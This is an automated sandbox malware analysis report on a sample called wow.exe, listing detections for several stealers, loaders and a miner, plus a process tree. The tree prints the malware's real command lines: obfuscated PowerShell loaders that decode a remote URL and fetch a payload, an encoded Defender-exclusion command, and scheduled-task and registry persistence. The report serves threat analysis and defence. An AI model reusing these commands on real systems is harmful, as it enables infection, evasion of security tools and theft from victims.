Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wow.exe

Overview

General Information

Sample name:wow.exe
Analysis ID:1600177
MD5:b2c17e4aaa1ab07e2be2c6e08120c7fe
SHA1:67eb0fbafb9d75d7e95dc8429c09a99e73ed5c74
SHA256:d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d
Tags:5-253-59-205bookingexespam-itauser-JAMESWT_MHT
Infos:

Detection

Amadey, GhostRat, GuLoader, LummaC Stealer, XWorm, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey bot
Yara detected GhostRat
Yara detected GuLoader
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected XWorm
Yara detected Xmrig cryptocurrency miner
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contain functionality to detect virtual machines
Creates / moves files in alternative data streams (ADS)
Creates HTML files with .exe extension (expired dropper behavior)
Creates an undocumented autostart registry key
Encrypted powershell cmdline option found
Found Tor onion address
Found evasive API chain (may stop execution after checking volume information)
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Monitors registry run keys for changes
Opens the same file many times (likely Sandbox evasion)
PE file has a writeable .text section
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to load drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wow.exe (PID: 2488 cmdline: "C:\Users\user\Desktop\wow.exe" MD5: B2C17E4AAA1AB07E2BE2C6E08120C7FE)
    • conhost.exe (PID: 3660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wow.exe (PID: 6092 cmdline: "C:\Users\user\Desktop\wow.exe" MD5: B2C17E4AAA1AB07E2BE2C6E08120C7FE)
      • Loader.exe (PID: 1832 cmdline: "C:\Users\user\Downloads\haus\Loader.exe" MD5: AE879EE9C4A8AE4EFE028F51CA4C2522)
        • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sel1.exe (PID: 7188 cmdline: "C:\Users\user\Downloads\haus\sel1.exe" MD5: 6C8E0B575F1A144D7338604B7F0C433D)
        • svchost.exe (PID: 7240 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
          • WerFault.exe (PID: 5032 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7240 -s 1288 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • ABC.exe (PID: 7204 cmdline: "C:\Users\user\Downloads\haus\ABC.exe" MD5: C23E351A56DEC7BD24FB42C187C0C0D1)
        • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ABC.exe (PID: 7440 cmdline: C:\Users\user\Downloads\haus\ABC.exe MD5: C23E351A56DEC7BD24FB42C187C0C0D1)
          • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WerFault.exe (PID: 7984 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1036 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • traf.exe (PID: 7220 cmdline: "C:\Users\user\Downloads\haus\traf.exe" MD5: 77947379B9E26603DB5A24E63D9E68FC)
      • amada2.exe (PID: 7304 cmdline: "C:\Users\user\Downloads\haus\amada2.exe" MD5: 4BD4A99A7CF9E77972857A935D2CDDCB)
        • gdsun.exe (PID: 7328 cmdline: c:\programdata\1be588a5b7\gdsun.exe MD5: 4BD4A99A7CF9E77972857A935D2CDDCB)
          • reg.exe (PID: 7392 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\1be588a5b7 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • conhost.exe (PID: 7408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • vapo.exe (PID: 7348 cmdline: "C:\Users\user\Downloads\haus\vapo.exe" MD5: EE14A993B4F9BF8B3F0421F0A44C2057)
        • schtasks.exe (PID: 7624 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "vapo" /tr "C:\Users\user\AppData\Roaming\vapo.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • T.exe (PID: 7448 cmdline: "C:\Users\user\Downloads\haus\T.exe" MD5: 78FC1101948B2FD65E52E09F037BAC45)
        • powershell.exe (PID: 5176 cmdline: "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\T.exe' 'C:\ProgramData\1be588a5b7\T.exe' -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 7500 cmdline: "C:\Users\user\Downloads\haus\conhost.exe" MD5: C11A82D699A06D9B8BA4296E0C562AE4)
        • cmd.exe (PID: 7860 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8028 cmdline: powershell -EncodedCommand "PAAjAFcANQB1ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeABHAHMAVwBKAHUATQBXACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAFYAbgBCAHYARwBFADkASgBLACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAOABKADAAIwA+AA==" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • WmiPrvSE.exe (PID: 2724 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 988 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6036 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6620" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 3360 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6620" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • WatchDog.exe (PID: 7552 cmdline: "C:\Users\user\Downloads\haus\WatchDog.exe" MD5: 4AA5E32BFE02AC555756DC9A3C9CE583)
        • WerFault.exe (PID: 7308 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7552 -s 1472 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • Enalib.exe (PID: 7684 cmdline: "C:\Users\user\Downloads\haus\Enalib.exe" MD5: 78FC1101948B2FD65E52E09F037BAC45)
        • powershell.exe (PID: 7988 cmdline: "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\user\Downloads\haus\Enalib.exe' 'C:\ProgramData\1be588a5b7\Enalib.exe' -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7740 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Lovform.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 8004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Svrte; function Bebrejd($Stomode){$Gemologist=3;do{$Uncountervailed+=$Stomode[$Gemologist];$Gemologist+=4} until(!$Stomode[$Gemologist])$Uncountervailed}function Shoepacs137($Typhobacillosis){ .($Facies) ($Typhobacillosis)}$Reprsentationsudgifts=Bebrejd 'jouN oEVi TSni.SorW';$Reprsentationsudgifts+=Bebrejd 'UnheBenBSubCHa,LA ti BaeManN loT';$Landboforenings173=Bebrejd 'PolMLinoTouzB ni PrlMadl craVaf/';$Shirra=Bebrejd 'KnoTBoolI tssuz1Br 2';$Boligkonsulentens=' St[Norn onEdk.T bo..fvSEn EFrkRPervBryi eacInfePrepHydOexti onNDamtDyrMPavAFreNSejAUveG u eGenrNeu]Aar: el:LassSaeeFedc nuRafR StiFedTHanY idPEnjrAf.OlottCigo ruCOv O SmLBro=Kal$ djs kkhNyhi yrRTriR hea';$Landboforenings173+=Bebrejd 'Co 5Un . ss0 Sk .ig( A WCoriBr,n I dFaroUdfwSlasMng conN,anTIll Fe1M.c0 Bo.Ha.0Ypp;Gen GloWHjliInsnCaf6 an4flu; Un gsx Fi6Chr4 Pr;Dik S crForv C.:Per1 St3 ow4Ind. rn0Arn) I IneGFale DucpotkShioRes/Bo 2,aa0La 1Nig0kv 0 ev1Bod0For1Skr an,F itiUnsrBane nfM aoS uxSti/kon1N l3 dg4Drm.d.u0';$Bramantip=Bebrejd ' ru ShsDeleF rRDmp- ShATr gSmiEMilNAmbt';$Forskrev=Bebrejd 'SmahPapttvatFempChesSte:F r/Sy,/ ShfS ni MolJete udBaanHex.K,aeS iuTax/nivlNeumLaejKamMgen1 gtIOvetA.kibroFJarCSwiHBocjU cYK eABe 4KapJRauNBruRA aBMerYModBTr 3Mar4Sc / SaUUnonS cdbareon r vb Opa Akl ydaSelnDelcAboe rurStan,oleHjasTwi.tarjBebaS ovMana';$Sjaslikkens247=Bebrejd ' Op>';$Facies=Bebrejd 'NonITraE SuX';$Torrentially21='Topazolite';$Gordiaceous='\Transitvarerne.Fli';Shoepacs137 (Bebrejd 'F.l$HjfGAfsl leOAerb BraTeaL n:IrrPForR.dde heGNebn .peIn NBadoForlGr OUn,nopfEpre9Str4.il=gol$gi EnedN,kiv,ph:sydA VeP EkPge DMetAResTRe,aDec+ind$Plag NooDelRAskD NaI,ilaUnscAlpeTh Oas,uXylS');Shoepacs137 (Bebrejd 'lan$RetG E,l TiORelBLjba polO e: Fos utyTruDRekFTavO ViR ,ahPaeN,pig ScEAukNUnsE.ty= Se$ A,F.beO.ndrS.rSS ckKolRProEEnsV Dr..xcsEjePRutLsatIhottDyn(Ego$ uts E j InaBruSAbsl E i.usKKlikkoneLivN .as va2.pl4Hex7 u)');Shoepacs137 (Bebrejd $Boligkonsulentens);$Forskrev=$Sydforhngene[0];$Smutches=(Bebrejd 'Com$ ImgPreLTitOWaxbStraPrelTre: AusAf ASilP FiSFedU .oCAfgKI gEIncRSpaSLo =Runn aE VawMor- ndoPa.b,enJRapeF,dc.onTU,m OgdsPl,YH,nS,inTQuiE ,im Li..ta$SecRSjlETriPBruRT.iSNonEAntn,ouT B.ARotT eIGenO .yNSkrsCosu end BlGSupI nfGimt .ds');Shoepacs137 ($Smutches);Shoepacs137 (Bebrejd ' h$CatSUnoaTampnrrs TuuDescSnikEnde FerTo s pu.BnkH E,e tea VedLumeRebrBilsSub[Op $ unBZerrAlba Inm braVe npartSpoiKonp,ta]Tel= L $,peLOu a tonBuddTikbP roignf iso Oprbr eEftnFabiFornJasgSensMe 1Ens7 Sn3');$Udfordrernes229=Bebrejd 'P.d$SkaSJ.ra BrpAr.s F,uCouc PekHoleE sr Cos xy.S dD ,no raw knnRefl Bio Sna Bud,epFAboiPrelTwieFol( Sp$CanF Gro rerCyms P.kNewrSomeChrvInv,Bev$ForKIvrohavaPenlt piNert E i B.oO tnT.ie .nn C,s Al)';$Koalitionens=$Pregnenolone94;Shoepacs137 (Bebrejd 'Sku$S,oGInclGusoReib SyaDisLFol:BesnStrOSurnPalROvie ,uM OvEImmdL,gITh aTorb WaLScaEC u=Gaa( ArTBlaeHersRg.tSup-Manp NoATitT skhUnd Hal$Ex kNytOTotaLe LGirI imtB oiTa,OLavnBegePl.np.ds De)');while (!$Nonremediable) {Shoepacs137 (Bebrejd 'Hor$ rgP olchao HjbTilacrolJes: trSheso S lGenfPs yUnglBe.dIndtA.h= Ef$S,aSObdpAgteLsbjBlod Nie anrStelunrfC,ntRepeJaertiln T.e Mis') ;Shoepacs137 $Udfordrernes229;Shoepacs137 (Bebrejd 'GensResTAfaa BrrT et R,-korsOveL.laEPleEKa p e, Mot4');Shoepacs137 (Bebrejd 'Opp$CocgforLSceO utbL,saR pLPro: umNFrioV nnDenrA sEKruMSimeincDB eIRepABj b a lCo epja= sy(Ud tBy,E,riS Wot Se-C,ipHybAS otAriHOrt Too$A tKForOFunATicL,atI Opt BeiUnso ApnOveeOutNFalSMas)') ;Shoepacs137 (Bebrejd 'R,t$IreGEksLKahOGamBCyaaK.mlPro:FloNin EK nD S,R CaY mvKUdaKMare aDPenETorsVal=Sa,$ UogbidLConOUnlbLataS oLFyr:FhoTNedH anIL,moA alResiTopCPun+ Gr+yog%Ten$ DrSShayUnadForfIntoRosrP eHTilN asGStaE Ann Que i.TilCA to CoUExtNTr,t') ;$Forskrev=$Sydforhngene[$Nedrykkedes]}$Solidaristic174=85642;$Gyldige94=29812;Shoepacs137 (Bebrejd ' Ve$BerGForl Goo fab AmaLobLReb:Ud,E SrUInfroxeEK r Cho=T,e PifGs wE,neT t,-U ecLa OPopnRusTOr e B,niriT as ke$,unk AloSala stlDisIKogTKorIGamofjon D esurn Sts');Shoepacs137 (Bebrejd ' i$Forg hel eroPerbForaF alCen: viAPa p ,lpMonaPosrusai Tht Gro arCha She= Bl ne[bobSSnayCalsHolt teream st. .iCTido vanTovvhareUnsr AftU r] An:Cir:socFIndrStroDr mBaaBPeraDinsDybedec6.ur4P lSKultD brUsliIn nYdegUdt(Ser$LamEParuRedrKele Su)');Shoepacs137 (Bebrejd ' l$ T GPealKnaoPrebReeA,ntLA t:MidaBefmC apS.rH M OGenrPerISq CLen Tem=Un Aqu[KonS.asyGn SO.eTDksEBeaM il.MegTundE MixBortGr .IntEFugNA.scMetoBomDS mI EfnBarGRen]A,t:Fu :FedAMewS .hC acI.okIEge.PaagAldENectRa SAceTSe,R ekiUdkN BegO s(d b$ S.aLi PBidpridaSprrhydiInhT GlO,agRRe.)');Shoepacs137 (Bebrejd 'Sh.$HypgStulAzuODyrBL,dAproL Un: unE aatUneiLinOB tlU,gi Udz S.ebus=Non$N,taLilMYmpP ooHPheoDisR LaiRemcR.t.ProsHj uUdeB jS,opTUddrScaITimnSkrGSop(Win$u lSKomOUnflCheiPosDM nAUntREksiBadS.idT liAn.CS,e1Ker7E i4Ame,Fl,$ Mag,euyT,ol U DDo,iCl.gRicEFed9 Ve4 Di)');Shoepacs137 $Etiolize;" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7772 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Rodham.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Praefectorial61; function buxine($frugtavlens){$Millimicron=3;do{$Hestevognens+=$frugtavlens[$Millimicron];$Millimicron+=4} until(!$frugtavlens[$Millimicron])$Hestevognens}function Phonetist($Timebilletten){ .($procommemoration) ($Timebilletten)}$Bromphenol=buxine 'varnBelET eT.ru.RefW';$Bromphenol+=buxine 'SameLo bSkaCEroLUndigruE.rsn.ndT';$Bruttotonnagens=buxine ' trMShioAngzjoriArblTeblDykaWal/';$Hysses=buxine 'E rTUndlKnisRa 1 Es2';$Wispiness=' .t[ pn RrE ,ot lt.StrSRedESn RMagVSkaiSorCkeyEEltPMi,o GaIPhonDebTKr.mSrbaSt.NFeja S.GDelECytR Qu]Sha:Hyd:st SGoueJazClocuResrM sIEj,tA.lyEdipOb,r SiOSaltOliO B C HiON nl Ka= S.$UniHShoYRu sAlfS VaEDanS';$Bruttotonnagens+=buxine ' Fe5Unm.Su 0Fil Th(RenWFisi emnV,td NooMaaw losBl, UfoN coT Ku Gyp1,ro0 Sr.Bad0Sol;,ou Fu W VeiNonnHen6Shu4sch;S p dex nr6Cat4Foc;San Kryr U,vAfs:Cag1 nc3Ind4Trl.squ0,ou)Sur StyGgeneDiscSkok,vmomas/Sac2Ge 0 Ry1Swa0Ske0 ro1Led0Mil1 ft ecF bii Hor apeEksf HeoSvmxD t/Par1Re.3par4Par.Tu.0';$Procedurereglerne=buxine ' roUDiasKrbe w RVra- uaStoG StE Ban.jrt';$Isotomous222=buxine 'UdmhAt t ActUnlpAsysByg:lev/L,n/NonfFiliLivl FoeFrsd B,nTrk. BeeEnkuDei/ otlFormFurjThyMhae1LanIFoutSneiForFTilCSubHArrjuraYHasA H 4StrJAwaN faRT eBAnkYTraBTom3 Sm4Wes/ MuKSnraCapnIdeaSe r .oiPare lrG ne.genBrusTet.P.cq ,uxMond';$Raukle=buxine 'B,d>';$procommemoration=buxine ' V IFraET.aX';$Skiftnings='Teglvrksovn';$Sbredders='\Rten.Men';Phonetist (buxine ' Sc$.erg ,oLBanoRe.bUnaA,ral re:Spon TiO egn enOgenwA lnOpleR mrSem= eh$ A,e,erNHivvpre:CisAEklP FopAduDRe aB.lt dlaSta+Ban$RenSDykbBacr neD fd,urdStaeAutrU eS');Phonetist (buxine 'P e$OmvgmodlB loDkbBP raHreLMed: DifAalR VaaTott enrTa AP eeCinD B ESyslV.rS Ples,is KodU dA I GSenE ReNut =Nac$ForImins FooOvetspro S,MHemOCobUStosf.r2 Po2Pea2Aff.YonSCykpg,sLEugi DdT N (Unc$datrRaaAGr UHankTypLPowEG k)');Phonetist (buxine $Wispiness);$Isotomous222=$Fratraedelsesdagen[0];$sagnomspundent=(buxine 'C n$UneG raLAndOAmabSu,aSmlLObs:Up.D.eoEPreF ose FiNInteBepsskatPi.rHykA UntS aeKap= TrnMaxEPrewD s- rooMusbHykj UnesndCTret Lo ImpSU myLacSD wtViseHa.mFor.ung$U vBI drHouO Afm lP WahBu ESa NTiloMe.L');Phonetist ($sagnomspundent);Phonetist (buxine 'Sup$ etDCoue ymfMeseFornSp eFarsAfttLarrFleaUgetAcce R..Ru.He pe elaChrdEnfeUnsr MesArb[Dis$NutP arUndo wac N,e ErdtatuModr PoeL mrD aeAghgSuplBlae.murDe nLa e iv] T,=Bas$RenB Snr.onuStotS mtEksoSentinto Bin Conpr.aPolg Ene S.nFles');$Plectognathous=buxine 'Ank$ IrDIsoeskmfbule Agn O eBeas C tvarrW aaCiat O ePre.u,rD sooVinwN kn ylUdko SvaCryd LnFTkkiSpdlDemeBuk(Me.$Th IO.ksDetogrotAnloSupmAuto EgumonsSvi2 M 2 Pe2Fol,Mor$DriO I r,std omrFore eb.eleSuph ReaIntnHaad,enlOpfiPronHolgSo eGhonDom)';$Ordrebehandlingen=$nonowner;Phonetist (buxine 'Sor$M,agPr.lNonoOpubS ea,veL jo:AgrN Pui nfT axRBj,oU sp.ndH.ynY E T ubiPerCAmo= Na(BertRipELa SStrT.nb-S gPS laCo.tlevhTnk Lig$AfdoRygR oldDenrgrueD mBSyneIn HOppaHalnGgeDShalSpiI ViNSangPr EEksnSto)');while (!$Nitrophytic) {Phonetist (buxine 'Be.$Maig dulHovoBagbwbsa BelM,g: orUFranHoliRo nGrecUner DreU ia elsFo,i en.cogRei2 No4mo 4 y=D.s$ CoSIltaF,mmIm f dbu EknFetdForsR fkFolo atn F oSvemDauiSces') ;Phonetist $Plectognathous;Phonetist (buxine ' tasPest .cA AnR ogTRet- TrsB rL r.ETrbeAntPFam Un4');Phonetist (buxine 'Min$ .eGVarL G oO,oB Exa SyLSma:GrunSchIStrTFliRHeioForpRe HFirYLivtamfICoaCCo =Sn (A tTStreArkSQ,it J - Cap KlA agtR.jhMas Re$DetO verBesDTearamfEBotbSubeForHbr aSnenFild OulLovIA,sn Heg ReE Spn ,n)') ;Phonetist (buxine 'Div$ GegAarLAnaO NabTvaa S LSac:A iaidif .aKtilO LolPlaO.rkN ApiSepsSpeE rrNadICorN BrGSkasVil2Fly0Scr8Dro=Nyb$SkrgMenLJeeo PlbkimAAimLRad:ConcSonHRefEOveEOndr StIPe.oEur+Job+Ada%Aho$HykFHexrB,rA Twt elrGraa efEAcedOmgEAutl,riSPoreTesSRo DR vA hoG.orEPolN a .corC.kaoS.bu fbN.enT') ;$Isotomous222=$Fratraedelsesdagen[$Afkoloniserings208]}$Throbbingly=82700;$Millimicronndtgtsniveauer=30488;Phonetist (buxine 'Pre$StoGL jlCryoH,tBMaraBisLSai:M lt T,iTsaLMarlN nISkodGilSPa,eAttRPinKReelR mR uI ytNSkagtraEDaaRVr,SMak1 ek1Far0Asy Tr=Mal EthgTi E GuTNys-Skuchu ODimn igtC.cE esnDukt Dy Art$ ynoP yRPygDOrtRS,peStvbMddeStohkuraOxynLutDIntL ocIRegNComgTenESubn');Phonetist (buxine 'Del$Id.gSollPhyoHimbHemaForl Mi:Ko,OhanlL idLupeR,mfDdsd FarStaeGennFl eB.l Tu,= t R c[ PaSSeryWi s olt V,eSasmKmn.ThaCsnioMe nHypvEkseHalrP st .a] as:Hea:KarF orKupoTh.mSpoBarcaAldsIndeAux6 Ge4PouSLantPlar C i ern TrgMar(ski$ ErTJaciSerlOv l,ewiEngd hosKareSalrSlokunclTokrUopiSt,n pigN nevidrFors an1,eo1Pit0Ski)');Phonetist (buxine 'Chr$LinGGgelBe o TibSteA .iLSte: PudFenyDrebindSBratRidrDoru L,K GlTSa USubROp.SMan Hva=Pre Sta[StaS K.Y ReS anTTagEIntMAfv.hemtPhoeProXPanTUtr. ydE Kon eaCPreO wfDKo,iLevnCargYui] Os: u:SmuA NoSShaC hoI F itvi. N GIndeHarT A,SUnsTBrirElmIP.oNSamg rd(Tra$vidORi L DodBabe plFConD PrREmpeUdpnFyse .n)');Phonetist (buxine 'Sop$Pr GGe L .rOBroB .eah,ll .d:Fosp SeH,vaoRess isPSjuHOveOZesROthEVa SD ic FaeFordPre2 Fi2Ban8Fin=bim$SemDTenykalb BuS atSa,r BaUA.fKRaaT abuMunRpetsSta. BasNasURehBNoss.ndtbi rStiiLorNPamGHes( Bs$OpftLibHKarRSnaO.ilbF rBFyrI brNAfsg.umLBruYJim,Fos$HabmFali rfLSkrLu.fI,ndMCeniFlyC C R FiO.ednG,uN fbDUbetFergGraTKrfsC lnC,riIntvUnpeLi a .oUEasELibrSut)');Phonetist $Phosphoresced228;" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7848 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Downloads\haus\Fuldautomatiseres.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
